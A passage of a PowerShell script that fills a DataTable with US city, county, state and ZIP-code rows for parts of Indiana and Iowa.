$Cities.Rows.Add("Celestine","Dubois","Indiana","IN","18","47521") + $null = $Cities.Rows.Add("Crane naval depo","Martin","Indiana","IN","18","47522") + $null = $Cities.Rows.Add("Dale","Spencer","Indiana","IN","18","47523") + $null = $Cities.Rows.Add("Decker","Knox","Indiana","IN","18","47524") + $null = $Cities.Rows.Add("Derby","Perry","Indiana","IN","18","47525") + $null = $Cities.Rows.Add("Dubois","Dubois","Indiana","IN","18","47527") + $null = $Cities.Rows.Add("Edwardsport","Knox","Indiana","IN","18","47528") + $null = $Cities.Rows.Add("Elnora","Daviess","Indiana","IN","18","47529") + $null = $Cities.Rows.Add("Evanston","Spencer","Indiana","IN","18","47531") + $null = $Cities.Rows.Add("Ferdinand","Dubois","Indiana","IN","18","47532") + $null = $Cities.Rows.Add("Freelandville","Knox","Indiana","IN","18","47535") + $null = $Cities.Rows.Add("Fulda","Spencer","Indiana","IN","18","47536") + $null = $Cities.Rows.Add("Gentryville","Spencer","Indiana","IN","18","47537") + $null = $Cities.Rows.Add("Holland","Dubois","Indiana","IN","18","47541") + $null = $Cities.Rows.Add("Huntingburg","Dubois","Indiana","IN","18","47542") + $null = $Cities.Rows.Add("Ireland","Dubois","Indiana","IN","18","47545") + $null = $Cities.Rows.Add("Haysville","Dubois","Indiana","IN","18","47546") + $null = $Cities.Rows.Add("Buffaloville","Spencer","Indiana","IN","18","47550") + $null = $Cities.Rows.Add("Leopold","Perry","Indiana","IN","18","47551") + $null = $Cities.Rows.Add("Lincoln city","Spencer","Indiana","IN","18","47552") + $null = $Cities.Rows.Add("Loogootee","Martin","Indiana","IN","18","47553") + $null = $Cities.Rows.Add("Monroe city","Knox","Indiana","IN","18","47557") + $null = $Cities.Rows.Add("Montgomery","Daviess","Indiana","IN","18","47558") + $null = $Cities.Rows.Add("Oaktown","Knox","Indiana","IN","18","47561") + $null = $Cities.Rows.Add("Odon","Daviess","Indiana","IN","18","47562") + $null = $Cities.Rows.Add("Otwell","Pike","Indiana","IN","18","47564") + $null = $Cities.Rows.Add("Petersburg","Pike","Indiana","IN","18","47567") + $null = $Cities.Rows.Add("Plainville","Daviess","Indiana","IN","18","47568") + $null = $Cities.Rows.Add("Rome","Perry","Indiana","IN","18","47574") + $null = $Cities.Rows.Add("Kyana","Dubois","Indiana","IN","18","47575") + $null = $Cities.Rows.Add("Saint croix","Perry","Indiana","IN","18","47576") + $null = $Cities.Rows.Add("Saint meinrad","Spencer","Indiana","IN","18","47577") + $null = $Cities.Rows.Add("Sandborn","Knox","Indiana","IN","18","47578") + $null = $Cities.Rows.Add("Santa claus","Spencer","Indiana","IN","18","47579") + $null = $Cities.Rows.Add("Schnellville","Dubois","Indiana","IN","18","47580") + $null = $Cities.Rows.Add("Shoals","Martin","Indiana","IN","18","47581") + $null = $Cities.Rows.Add("Spurgeon","Pike","Indiana","IN","18","47584") + $null = $Cities.Rows.Add("Stendal","Pike","Indiana","IN","18","47585") + $null = $Cities.Rows.Add("Tell city","Perry","Indiana","IN","18","47586") + $null = $Cities.Rows.Add("Troy","Perry","Indiana","IN","18","47588") + $null = $Cities.Rows.Add("Velpen","Pike","Indiana","IN","18","47590") + $null = $Cities.Rows.Add("Vincennes","Knox","Indiana","IN","18","47591") + $null = $Cities.Rows.Add("Westphalia","Knox","Indiana","IN","18","47596") + $null = $Cities.Rows.Add("Wheatland","Knox","Indiana","IN","18","47597") + $null = $Cities.Rows.Add("Winslow","Pike","Indiana","IN","18","47598") + $null = $Cities.Rows.Add("Zcta 475hh","Daviess","Indiana","IN","18","475HH") + $null = $Cities.Rows.Add("Boonville","Warrick","Indiana","IN","18","47601") + $null = $Cities.Rows.Add("Chandler","Warrick","Indiana","IN","18","47610") + $null = $Cities.Rows.Add("Chrisney","Spencer","Indiana","IN","18","47611") + $null = $Cities.Rows.Add("Cynthiana","Posey","Indiana","IN","18","47612") + $null = $Cities.Rows.Add("Elberfeld","Warrick","Indiana","IN","18","47613") + $null = $Cities.Rows.Add("Grandview","Spencer","Indiana","IN","18","47615") + $null = $Cities.Rows.Add("Griffin","Posey","Indiana","IN","18","47616") + $null = $Cities.Rows.Add("Lynnville","Warrick","Indiana","IN","18","47619") + $null = $Cities.Rows.Add("Mount vernon","Posey","Indiana","IN","18","47620") + $null = $Cities.Rows.Add("Newburgh","Warrick","Indiana","IN","18","47630") + $null = $Cities.Rows.Add("New harmony","Posey","Indiana","IN","18","47631") + $null = $Cities.Rows.Add("Poseyville","Posey","Indiana","IN","18","47633") + $null = $Cities.Rows.Add("Richland","Spencer","Indiana","IN","18","47634") + $null = $Cities.Rows.Add("Rockport","Spencer","Indiana","IN","18","47635") + $null = $Cities.Rows.Add("Tennyson","Warrick","Indiana","IN","18","47637") + $null = $Cities.Rows.Add("Wadesville","Posey","Indiana","IN","18","47638") + $null = $Cities.Rows.Add("Haubstadt","Gibson","Indiana","IN","18","47639") + $null = $Cities.Rows.Add("Hazleton","Gibson","Indiana","IN","18","47640") + $null = $Cities.Rows.Add("Buckskin","Gibson","Indiana","IN","18","47647") + $null = $Cities.Rows.Add("Fort branch","Gibson","Indiana","IN","18","47648") + $null = $Cities.Rows.Add("Francisco","Gibson","Indiana","IN","18","47649") + $null = $Cities.Rows.Add("Mackey","Gibson","Indiana","IN","18","47654") + $null = $Cities.Rows.Add("Oakland city","Gibson","Indiana","IN","18","47660") + $null = $Cities.Rows.Add("Owensville","Gibson","Indiana","IN","18","47665") + $null = $Cities.Rows.Add("Patoka","Gibson","Indiana","IN","18","47666") + $null = $Cities.Rows.Add("Princeton","Gibson","Indiana","IN","18","47670") + $null = $Cities.Rows.Add("Somerville","Gibson","Indiana","IN","18","47683") + $null = $Cities.Rows.Add("Zcta 476hh","Gibson","Indiana","IN","18","476HH") + $null = $Cities.Rows.Add("Evansville","Vanderburgh","Indiana","IN","18","47708") + $null = $Cities.Rows.Add("Evansville","Vanderburgh","Indiana","IN","18","47710") + $null = $Cities.Rows.Add("Evansville","Vanderburgh","Indiana","IN","18","47711") + $null = $Cities.Rows.Add("Evansville","Vanderburgh","Indiana","IN","18","47712") + $null = $Cities.Rows.Add("Evansville","Vanderburgh","Indiana","IN","18","47713") + $null = $Cities.Rows.Add("Evansville","Vanderburgh","Indiana","IN","18","47714") + $null = $Cities.Rows.Add("Evansville","Vanderburgh","Indiana","IN","18","47715") + $null = $Cities.Rows.Add("Evansville","Vanderburgh","Indiana","IN","18","47720") + $null = $Cities.Rows.Add("Zcta 47725","Vanderburgh","Indiana","IN","18","47725") + $null = $Cities.Rows.Add("Terre haute","Vigo","Indiana","IN","18","47802") + $null = $Cities.Rows.Add("Terre haute","Vigo","Indiana","IN","18","47803") + $null = $Cities.Rows.Add("Terre haute","Vigo","Indiana","IN","18","47804") + $null = $Cities.Rows.Add("North terre haut","Vigo","Indiana","IN","18","47805") + $null = $Cities.Rows.Add("Terre haute","Vigo","Indiana","IN","18","47807") + $null = $Cities.Rows.Add("Bloomingdale","Parke","Indiana","IN","18","47832") + $null = $Cities.Rows.Add("Bowling green","Clay","Indiana","IN","18","47833") + $null = $Cities.Rows.Add("Brazil","Clay","Indiana","IN","18","47834") + $null = $Cities.Rows.Add("Bridgeton","Parke","Indiana","IN","18","47836") + $null = $Cities.Rows.Add("Carbon","Clay","Indiana","IN","18","47837") + $null = $Cities.Rows.Add("Carlisle","Sullivan","Indiana","IN","18","47838") + $null = $Cities.Rows.Add("Centerpoint","Clay","Indiana","IN","18","47840") + $null = $Cities.Rows.Add("Clay city","Clay","Indiana","IN","18","47841") + $null = $Cities.Rows.Add("Clinton","Vermillion","Indiana","IN","18","47842") + $null = $Cities.Rows.Add("Cory","Clay","Indiana","IN","18","47846") + $null = $Cities.Rows.Add("Dana","Vermillion","Indiana","IN","18","47847") + $null = $Cities.Rows.Add("Dugger","Sullivan","Indiana","IN","18","47848") + $null = $Cities.Rows.Add("Fairbanks","Sullivan","Indiana","IN","18","47849") + $null = $Cities.Rows.Add("Farmersburg","Sullivan","Indiana","IN","18","47850") + $null = $Cities.Rows.Add("Harmony","Clay","Indiana","IN","18","47853") + $null = $Cities.Rows.Add("Hillsdale","Vermillion","Indiana","IN","18","47854") + $null = $Cities.Rows.Add("Hymera","Sullivan","Indiana","IN","18","47855") + $null = $Cities.Rows.Add("Judson","Parke","Indiana","IN","18","47856") + $null = $Cities.Rows.Add("Lewis","Clay","Indiana","IN","18","47858") + $null = $Cities.Rows.Add("Marshall","Parke","Indiana","IN","18","47859") + $null = $Cities.Rows.Add("Mecca","Parke","Indiana","IN","18","47860") + $null = $Cities.Rows.Add("Merom","Sullivan","Indiana","IN","18","47861") + $null = $Cities.Rows.Add("Montezuma","Parke","Indiana","IN","18","47862") + $null = $Cities.Rows.Add("New goshen","Vigo","Indiana","IN","18","47863") + $null = $Cities.Rows.Add("Paxton","Sullivan","Indiana","IN","18","47865") + $null = $Cities.Rows.Add("Pimento","Vigo","Indiana","IN","18","47866") + $null = $Cities.Rows.Add("Poland","Owen","Indiana","IN","18","47868") + $null = $Cities.Rows.Add("Rockville","Parke","Indiana","IN","18","47872") + $null = $Cities.Rows.Add("Rosedale","Parke","Indiana","IN","18","47874") + $null = $Cities.Rows.Add("Saint mary of th","Vigo","Indiana","IN","18","47876") + $null = $Cities.Rows.Add("Shelburn","Sullivan","Indiana","IN","18","47879") + $null = $Cities.Rows.Add("Staunton","Clay","Indiana","IN","18","47881") + $null = $Cities.Rows.Add("Sullivan","Sullivan","Indiana","IN","18","47882") + $null = $Cities.Rows.Add("Universal","Vermillion","Indiana","IN","18","47884") + $null = $Cities.Rows.Add("Sandford","Vigo","Indiana","IN","18","47885") + $null = $Cities.Rows.Add("Zcta 478hh","Owen","Indiana","IN","18","478HH") + $null = $Cities.Rows.Add("Lafayette","Tippecanoe","Indiana","IN","18","47901") + $null = $Cities.Rows.Add("Lafayette","Tippecanoe","Indiana","IN","18","47904") + $null = $Cities.Rows.Add("Lafayette","Tippecanoe","Indiana","IN","18","47905") + $null = $Cities.Rows.Add("West lafayette","Tippecanoe","Indiana","IN","18","47906") + $null = $Cities.Rows.Add("Zcta 47909","Tippecanoe","Indiana","IN","18","47909") + $null = $Cities.Rows.Add("Alamo","Montgomery","Indiana","IN","18","47916") + $null = $Cities.Rows.Add("Ambia","Benton","Indiana","IN","18","47917") + $null = $Cities.Rows.Add("Attica","Fountain","Indiana","IN","18","47918") + $null = $Cities.Rows.Add("Battle ground","Tippecanoe","Indiana","IN","18","47920") + $null = $Cities.Rows.Add("Boswell","Benton","Indiana","IN","18","47921") + $null = $Cities.Rows.Add("Brook","Newton","Indiana","IN","18","47922") + $null = $Cities.Rows.Add("Brookston","White","Indiana","IN","18","47923") + $null = $Cities.Rows.Add("Buck creek","Tippecanoe","Indiana","IN","18","47924") + $null = $Cities.Rows.Add("Buffalo","White","Indiana","IN","18","47925") + $null = $Cities.Rows.Add("Burnettsville","White","Indiana","IN","18","47926") + $null = $Cities.Rows.Add("Cayuga","Vermillion","Indiana","IN","18","47928") + $null = $Cities.Rows.Add("Chalmers","White","Indiana","IN","18","47929") + $null = $Cities.Rows.Add("Clarks hill","Tippecanoe","Indiana","IN","18","47930") + $null = $Cities.Rows.Add("Covington","Fountain","Indiana","IN","18","47932") + $null = $Cities.Rows.Add("Crawfordsville","Montgomery","Indiana","IN","18","47933") + $null = $Cities.Rows.Add("Darlington","Montgomery","Indiana","IN","18","47940") + $null = $Cities.Rows.Add("Dayton","Tippecanoe","Indiana","IN","18","47941") + $null = $Cities.Rows.Add("Earl park","Benton","Indiana","IN","18","47942") + $null = $Cities.Rows.Add("Fair oaks","Jasper","Indiana","IN","18","47943") + $null = $Cities.Rows.Add("Fowler","Benton","Indiana","IN","18","47944") + $null = $Cities.Rows.Add("Francesville","Pulaski","Indiana","IN","18","47946") + $null = $Cities.Rows.Add("Goodland","Newton","Indiana","IN","18","47948") + $null = $Cities.Rows.Add("Hillsboro","Fountain","Indiana","IN","18","47949") + $null = $Cities.Rows.Add("Idaville","White","Indiana","IN","18","47950") + $null = $Cities.Rows.Add("Kentland","Newton","Indiana","IN","18","47951") + $null = $Cities.Rows.Add("Cates","Fountain","Indiana","IN","18","47952") + $null = $Cities.Rows.Add("Ladoga","Montgomery","Indiana","IN","18","47954") + $null = $Cities.Rows.Add("Linden","Montgomery","Indiana","IN","18","47955") + $null = $Cities.Rows.Add("Medaryville","Pulaski","Indiana","IN","18","47957") + $null = $Cities.Rows.Add("Mellott","Fountain","Indiana","IN","18","47958") + $null = $Cities.Rows.Add("Monon","White","Indiana","IN","18","47959") + $null = $Cities.Rows.Add("Monticello","White","Indiana","IN","18","47960") + $null = $Cities.Rows.Add("Morocco","Newton","Indiana","IN","18","47963") + $null = $Cities.Rows.Add("Mount ayr","Newton","Indiana","IN","18","47964") + $null = $Cities.Rows.Add("New market","Montgomery","Indiana","IN","18","47965") + $null = $Cities.Rows.Add("Newport","Vermillion","Indiana","IN","18","47966") + $null = $Cities.Rows.Add("New richmond","Montgomery","Indiana","IN","18","47967") + $null = $Cities.Rows.Add("New ross","Montgomery","Indiana","IN","18","47968") + $null = $Cities.Rows.Add("Newtown","Fountain","Indiana","IN","18","47969") + $null = $Cities.Rows.Add("Otterbein","Benton","Indiana","IN","18","47970") + $null = $Cities.Rows.Add("Oxford","Benton","Indiana","IN","18","47971") + $null = $Cities.Rows.Add("Perrysville","Vermillion","Indiana","IN","18","47974") + $null = $Cities.Rows.Add("Pine village","Warren","Indiana","IN","18","47975") + $null = $Cities.Rows.Add("Remington","Jasper","Indiana","IN","18","47977") + $null = $Cities.Rows.Add("Collegeville","Jasper","Indiana","IN","18","47978") + $null = $Cities.Rows.Add("Reynolds","White","Indiana","IN","18","47980") + $null = $Cities.Rows.Add("Romney","Tippecanoe","Indiana","IN","18","47981") + $null = $Cities.Rows.Add("State line","Warren","Indiana","IN","18","47982") + $null = $Cities.Rows.Add("Stockwell","Tippecanoe","Indiana","IN","18","47983") + $null = $Cities.Rows.Add("Templeton","Benton","Indiana","IN","18","47986") + $null = $Cities.Rows.Add("Veedersburg","Fountain","Indiana","IN","18","47987") + $null = $Cities.Rows.Add("Waveland","Montgomery","Indiana","IN","18","47989") + $null = $Cities.Rows.Add("Waynetown","Montgomery","Indiana","IN","18","47990") + $null = $Cities.Rows.Add("West lebanon","Warren","Indiana","IN","18","47991") + $null = $Cities.Rows.Add("Westpoint","Tippecanoe","Indiana","IN","18","47992") + $null = $Cities.Rows.Add("Marshfield","Warren","Indiana","IN","18","47993") + $null = $Cities.Rows.Add("Wingate","Montgomery","Indiana","IN","18","47994") + $null = $Cities.Rows.Add("Wolcott","White","Indiana","IN","18","47995") + $null = $Cities.Rows.Add("Yeoman","Carroll","Indiana","IN","18","47997") + $null = $Cities.Rows.Add("Zcta 479hh","Carroll","Indiana","IN","18","479HH") + $null = $Cities.Rows.Add("Ackworth","Warren","Iowa","IA","19","50001") + $null = $Cities.Rows.Add("Adair","Adair","Iowa","IA","19","50002") + $null = $Cities.Rows.Add("Adel","Dallas","Iowa","IA","19","50003") + $null = $Cities.Rows.Add("Albion","Marshall","Iowa","IA","19","50005") + $null = $Cities.Rows.Add("Alden","Hardin","Iowa","IA","19","50006") + $null = $Cities.Rows.Add("Alleman","Polk","Iowa","IA","19","50007") + $null = $Cities.Rows.Add("Allerton","Wayne","Iowa","IA","19","50008") + $null = $Cities.Rows.Add("Altoona","Polk","Iowa","IA","19","50009") + $null = $Cities.Rows.Add("Ames","Story","Iowa","IA","19","50010") + $null = $Cities.Rows.Add("Ames","Story","Iowa","IA","19","50014") + $null = $Cities.Rows.Add("Anita","Cass","Iowa","IA","19","50020") + $null = $Cities.Rows.Add("Ankeny","Polk","Iowa","IA","19","50021") + $null = $Cities.Rows.Add("Atlantic","Cass","Iowa","IA","19","50022") + $null = $Cities.Rows.Add("Audubon","Audubon","Iowa","IA","19","50025") + $null = $Cities.Rows.Add("Bagley","Guthrie","Iowa","IA","19","50026") + $null = $Cities.Rows.Add("Barnes city","Mahaska","Iowa","IA","19","50027") + $null = $Cities.Rows.Add("Baxter","Jasper","Iowa","IA","19","50028") + $null = $Cities.Rows.Add("Bayard","Guthrie","Iowa","IA","19","50029") + $null = $Cities.Rows.Add("Berwick","Polk","Iowa","IA","19","50032") + $null = $Cities.Rows.Add("Bevington","Madison","Iowa","IA","19","50033") + $null = $Cities.Rows.Add("Blairsburg","Hamilton","Iowa","IA","19","50034") + $null = $Cities.Rows.Add("Bondurant","Polk","Iowa","IA","19","50035") + $null = $Cities.Rows.Add("Boone","Boone","Iowa","IA","19","50036") + $null = $Cities.Rows.Add("Booneville","Dallas","Iowa","IA","19","50038") + $null = $Cities.Rows.Add("Bouton","Dallas","Iowa","IA","19","50039") + $null = $Cities.Rows.Add("Boxholm","Boone","Iowa","IA","19","50040") + $null = $Cities.Rows.Add("Bradford","Franklin","Iowa","IA","19","50041") + $null = $Cities.Rows.Add("Brayton","Audubon","Iowa","IA","19","50042") + $null = $Cities.Rows.Add("Bussey","Marion","Iowa","IA","19","50044") + $null = $Cities.Rows.Add("Cambridge","Story","Iowa","IA","19","50046") + $null = $Cities.Rows.Add("Carlisle","Warren","Iowa","IA","19","50047") + $null = $Cities.Rows.Add("Casey","Guthrie","Iowa","IA","19","50048") + $null = $Cities.Rows.Add("Chariton","Lucas","Iowa","IA","19","50049") + $null = $Cities.Rows.Add("Churdan","Greene","Iowa","IA","19","50050") + $null = $Cities.Rows.Add("Clemons","Marshall","Iowa","IA","19","50051") + $null = $Cities.Rows.Add("Clio","Wayne","Iowa","IA","19","50052") + $null = $Cities.Rows.Add("Colfax","Jasper","Iowa","IA","19","50054") + $null = $Cities.Rows.Add("Collins","Story","Iowa","IA","19","50055") + $null = $Cities.Rows.Add("Colo","Story","Iowa","IA","19","50056") + $null = $Cities.Rows.Add("Columbia","Marion","Iowa","IA","19","50057") + $null = $Cities.Rows.Add("Coon rapids","Carroll","Iowa","IA","19","50058") + $null = $Cities.Rows.Add("Cooper","Greene","Iowa","IA","19","50059") + $null = $Cities.Rows.Add("Sewal","Wayne","Iowa","IA","19","50060") + $null = $Cities.Rows.Add("Cumming","Warren","Iowa","IA","19","50061") + $null = $Cities.Rows.Add("Dallas","Marion","Iowa","IA","19","50062") + $null = $Cities.Rows.Add("Dallas center","Dallas","Iowa","IA","19","50063") + $null = $Cities.Rows.Add("Dana","Greene","Iowa","IA","19","50064") + $null = $Cities.Rows.Add("Pleasanton","Decatur","Iowa","IA","19","50065") + $null = $Cities.Rows.Add("Dawson","Dallas","Iowa","IA","19","50066") + $null = $Cities.Rows.Add("Decatur","Decatur","Iowa","IA","19","50067") + $null = $Cities.Rows.Add("Derby","Lucas","Iowa","IA","19","50068") + $null = $Cities.Rows.Add("De soto","Dallas","Iowa","IA","19","50069") + $null = $Cities.Rows.Add("Dexter","Dallas","Iowa","IA","19","50070") + $null = $Cities.Rows.Add("Dows","Wright","Iowa","IA","19","50071") + $null = $Cities.Rows.Add("Earlham","Madison","Iowa","IA","19","50072") + $null = $Cities.Rows.Add("Elkhart","Polk","Iowa","IA","19","50073") + $null = $Cities.Rows.Add("Ellston","Ringgold","Iowa","IA","19","50074") + $null = $Cities.Rows.Add("Ellsworth","Hamilton","Iowa","IA","19","50075") + $null = $Cities.Rows.Add("Exira","Audubon","Iowa","IA","19","50076") + $null = $Cities.Rows.Add("Ferguson","Marshall","Iowa","IA","19","50078") + $null = $Cities.Rows.Add("Zcta 500hh","Boone","Iowa","IA","19","500HH") + $null = $Cities.Rows.Add("Galt","Wright","Iowa","IA","19","50101") + $null = $Cities.Rows.Add("Garden city","Hardin","Iowa","IA","19","50102") + $null = $Cities.Rows.Add("Garden grove","Decatur","Iowa","IA","19","50103") + $null = $Cities.Rows.Add("Gibson","Keokuk","Iowa","IA","19","50104") + $null = $Cities.Rows.Add("Gilbert","Story","Iowa","IA","19","50105") + $null = $Cities.Rows.Add("Gilman","Marshall","Iowa","IA","19","50106") + $null = $Cities.Rows.Add("Grand junction","Greene","Iowa","IA","19","50107") + $null = $Cities.Rows.Add("Grand river","Decatur","Iowa","IA","19","50108") + $null = $Cities.Rows.Add("Granger","Dallas","Iowa","IA","19","50109") + $null = $Cities.Rows.Add("Gray","Audubon","Iowa","IA","19","50110") + $null = $Cities.Rows.Add("Grimes","Polk","Iowa","IA","19","50111") + $null = $Cities.Rows.Add("Grinnell","Poweshiek","Iowa","IA","19","50112") + $null = $Cities.Rows.Add("Guthrie center","Guthrie","Iowa","IA","19","50115") + $null = $Cities.Rows.Add("Hamilton","Marion","Iowa","IA","19","50116") + $null = $Cities.Rows.Add("Hamlin","Audubon","Iowa","IA","19","50117") + $null = $Cities.Rows.Add("Hartford","Warren","Iowa","IA","19","50118") + $null = $Cities.Rows.Add("Harvey","Marion","Iowa","IA","19","50119") + $null = $Cities.Rows.Add("Haverhill","Marshall","Iowa","IA","19","50120") + $null = $Cities.Rows.Add("Hubbard","Hardin","Iowa","IA","19","50122") + $null = $Cities.Rows.Add("Humeston","Wayne","Iowa","IA","19","50123") + $null = $Cities.Rows.Add("Huxley","Story","Iowa","IA","19","50124") + $null = $Cities.Rows.Add("Spring hill","Warren","Iowa","IA","19","50125") + $null = $Cities.Rows.Add("Iowa falls","Hardin","Iowa","IA","19","50126") + $null = $Cities.Rows.Add("Jamaica","Guthrie","Iowa","IA","19","50128") + $null = $Cities.Rows.Add("Jefferson","Greene","Iowa","IA","19","50129") + $null = $Cities.Rows.Add("Jewell","Hamilton","Iowa","IA","19","50130") + $null = $Cities.Rows.Add("Johnston","Polk","Iowa","IA","19","50131") + $null = $Cities.Rows.Add("Kamrar","Hamilton","Iowa","IA","19","50132") + $null = $Cities.Rows.Add("Kellerton","Ringgold","Iowa","IA","19","50133") + $null = $Cities.Rows.Add("Kelley","Story","Iowa","IA","19","50134") + $null = $Cities.Rows.Add("Kellogg","Jasper","Iowa","IA","19","50135") + $null = $Cities.Rows.Add("Keswick","Keokuk","Iowa","IA","19","50136") + $null = $Cities.Rows.Add("Killduff","Jasper","Iowa","IA","19","50137") + $null = $Cities.Rows.Add("Knoxville","Marion","Iowa","IA","19","50138") + $null = $Cities.Rows.Add("Lacona","Warren","Iowa","IA","19","50139") + $null = $Cities.Rows.Add("Lamoni","Decatur","Iowa","IA","19","50140") + $null = $Cities.Rows.Add("Laurel","Marshall","Iowa","IA","19","50141") + $null = $Cities.Rows.Add("Le grand","Marshall","Iowa","IA","19","50142") + $null = $Cities.Rows.Add("Leighton","Mahaska","Iowa","IA","19","50143") + $null = $Cities.Rows.Add("Leon","Decatur","Iowa","IA","19","50144") + $null = $Cities.Rows.Add("Liberty center","Warren","Iowa","IA","19","50145") + $null = $Cities.Rows.Add("Linden","Dallas","Iowa","IA","19","50146") + $null = $Cities.Rows.Add("Lineville","Wayne","Iowa","IA","19","50147") + $null = $Cities.Rows.Add("Liscomb","Marshall","Iowa","IA","19","50148") + $null = $Cities.Rows.Add("Lorimor","Union","Iowa","IA","19","50149") + $null = $Cities.Rows.Add("Lovilia","Monroe","Iowa","IA","19","50150") + $null = $Cities.Rows.Add("Lucas","Lucas","Iowa","IA","19","50151") + $null = $Cities.Rows.Add("Luther","Boone","Iowa","IA","19","50152") + $null = $Cities.Rows.Add("Lynnville","Jasper","Iowa","IA","19","50153") + $null = $Cities.Rows.Add("Mc callsburg","Story","Iowa","IA","19","50154") + $null = $Cities.Rows.Add("Macksburg","Madison","Iowa","IA","19","50155") + $null = $Cities.Rows.Add("Madrid","Boone","Iowa","IA","19","50156") + $null = $Cities.Rows.Add("Malcom","Poweshiek","Iowa","IA","19","50157") + $null = $Cities.Rows.Add("Marshalltown","Marshall","Iowa","IA","19","50158") + $null = $Cities.Rows.Add("Martensdale","Warren","Iowa","IA","19","50160") + $null = $Cities.Rows.Add("Maxwell","Story","Iowa","IA","19","50161") + $null = $Cities.Rows.Add("Melbourne","Marshall","Iowa","IA","19","50162") + $null = $Cities.Rows.Add("Menlo","Guthrie","Iowa","IA","19","50164") + $null = $Cities.Rows.Add("Millerton","Wayne","Iowa","IA","19","50165") + $null = $Cities.Rows.Add("Milo","Warren","Iowa","IA","19","50166") + $null = $Cities.Rows.Add("Minburn","Dallas","Iowa","IA","19","50167") + $null = $Cities.Rows.Add("Mingo","Jasper","Iowa","IA","19","50168") + $null = $Cities.Rows.Add("Mitchellville","Polk","Iowa","IA","19","50169") + $null = $Cities.Rows.Add("Monroe","Jasper","Iowa","IA","19","50170") + $null = $Cities.Rows.Add("Montezuma","Poweshiek","Iowa","IA","19","50171") + $null = $Cities.Rows.Add("Montour","Tama","Iowa","IA","19","50173") + $null = $Cities.Rows.Add("Murray","Clarke","Iowa","IA","19","50174") + $null = $Cities.Rows.Add("Zcta 501hh","Boone","Iowa","IA","19","501HH") + $null = $Cities.Rows.Add("Nevada","Story","Iowa","IA","19","50201") + $null = $Cities.Rows.Add("New providence","Hardin","Iowa","IA","19","50206") + $null = $Cities.Rows.Add("New sharon","Mahaska","Iowa","IA","19","50207") + $null = $Cities.Rows.Add("Newton","Jasper","Iowa","IA","19","50208") + $null = $Cities.Rows.Add("New virginia","Warren","Iowa","IA","19","50210") + $null = $Cities.Rows.Add("Norwalk","Warren","Iowa","IA","19","50211") + $null = $Cities.Rows.Add("Ogden","Boone","Iowa","IA","19","50212") + $null = $Cities.Rows.Add("Osceola","Clarke","Iowa","IA","19","50213") + $null = $Cities.Rows.Add("Otley","Marion","Iowa","IA","19","50214") + $null = $Cities.Rows.Add("Panora","Guthrie","Iowa","IA","19","50216") + $null = $Cities.Rows.Add("Paton","Greene","Iowa","IA","19","50217") + $null = $Cities.Rows.Add("Patterson","Madison","Iowa","IA","19","50218") + $null = $Cities.Rows.Add("Pella","Marion","Iowa","IA","19","50219") + $null = $Cities.Rows.Add("Perry","Dallas","Iowa","IA","19","50220") + $null = $Cities.Rows.Add("Peru","Madison","Iowa","IA","19","50222") + $null = $Cities.Rows.Add("Pilot mound","Boone","Iowa","IA","19","50223") + $null = $Cities.Rows.Add("Pleasantville","Marion","Iowa","IA","19","50225") + $null = $Cities.Rows.Add("Polk city","Polk","Iowa","IA","19","50226") + $null = $Cities.Rows.Add("Popejoy","Franklin","Iowa","IA","19","50227") + $null = $Cities.Rows.Add("Prairie city","Jasper","Iowa","IA","19","50228") + $null = $Cities.Rows.Add("Prole","Warren","Iowa","IA","19","50229") + $null = $Cities.Rows.Add("Radcliffe","Hardin","Iowa","IA","19","50230") + $null = $Cities.Rows.Add("Randall","Hamilton","Iowa","IA","19","50231") + $null = $Cities.Rows.Add("Reasnor","Jasper","Iowa","IA","19","50232") + $null = $Cities.Rows.Add("Redfield","Dallas","Iowa","IA","19","50233") + $null = $Cities.Rows.Add("Rhodes","Marshall","Iowa","IA","19","50234") + $null = $Cities.Rows.Add("Rippey","Greene","Iowa","IA","19","50235") + $null = $Cities.Rows.Add("Roland","Story","Iowa","IA","19","50236") + $null = $Cities.Rows.Add("Runnells","Polk","Iowa","IA","19","50237") + $null = $Cities.Rows.Add("Russell","Lucas","Iowa","IA","19","50238") + $null = $Cities.Rows.Add("Saint anthony","Marshall","Iowa","IA","19","50239") + $null = $Cities.Rows.Add("Saint charles","Madison","Iowa","IA","19","50240") + $null = $Cities.Rows.Add("Saint marys","Warren","Iowa","IA","19","50241") + $null = $Cities.Rows.Add("Searsboro","Poweshiek","Iowa","IA","19","50242") + $null = $Cities.Rows.Add("Sheldahl","Polk","Iowa","IA","19","50243") + $null = $Cities.Rows.Add("Slater","Story","Iowa","IA","19","50244") + $null = $Cities.Rows.Add("Stanhope","Hamilton","Iowa","IA","19","50246") + $null = $Cities.Rows.Add("State center","Marshall","Iowa","IA","19","50247") + $null = $Cities.Rows.Add("Story city","Story","Iowa","IA","19","50248") + $null = $Cities.Rows.Add("Stratford","Hamilton","Iowa","IA","19","50249") + $null = $Cities.Rows.Add("Stuart","Guthrie","Iowa","IA","19","50250") + $null = $Cities.Rows.Add("Sully","Jasper","Iowa","IA","19","50251") + $null = $Cities.Rows.Add("Swan","Marion","Iowa","IA","19","50252") + $null = $Cities.Rows.Add("Thayer","Union","Iowa","IA","19","50254") + $null = $Cities.Rows.Add("Tracy","Marion","Iowa","IA","19","50256") + $null = $Cities.Rows.Add("Truro","Madison","Iowa","IA","19","50257") + $null = $Cities.Rows.Add("Union","Hardin","Iowa","IA","19","50258") + $null = $Cities.Rows.Add("Van meter","Dallas","Iowa","IA","19","50261") + $null = $Cities.Rows.Add("Van wert","Decatur","Iowa","IA","19","50262") + $null = $Cities.Rows.Add("Waukee","Dallas","Iowa","IA","19","50263") + $null = $Cities.Rows.Add("Weldon","Decatur","Iowa","IA","19","50264") + $null = $Cities.Rows.Add("West des moines","Polk","Iowa","IA","19","50265") + $null = $Cities.Rows.Add("West des moines","Polk","Iowa","IA","19","50266") + $null = $Cities.Rows.Add("What cheer","Keokuk","Iowa","IA","19","50268") + $null = $Cities.Rows.Add("Whitten","Hardin","Iowa","IA","19","50269") + $null = $Cities.Rows.Add("Williams","Hamilton","Iowa","IA","19","50271") + $null = $Cities.Rows.Add("Williamson","Lucas","Iowa","IA","19","50272") + $null = $Cities.Rows.Add("Winterset","Madison","Iowa","IA","19","50273") + $null = $Cities.Rows.Add("Wiota","Cass","Iowa","IA","19","50274") + $null = $Cities.Rows.Add("Woodburn","Clarke","Iowa","IA","19","50275") + $null = $Cities.Rows.Add("Woodward","Dallas","Iowa","IA","19","50276") + $null = $Cities.Rows.Add("Yale","Guthrie","Iowa","IA","19","50277") + $null = $Cities.Rows.Add("Zearing","Story","Iowa","IA","19","50278") + $null = $Cities.Rows.Add("Zcta 502hh","Boone","Iowa","IA","19","502HH") + $null = $Cities.Rows.Add("Des 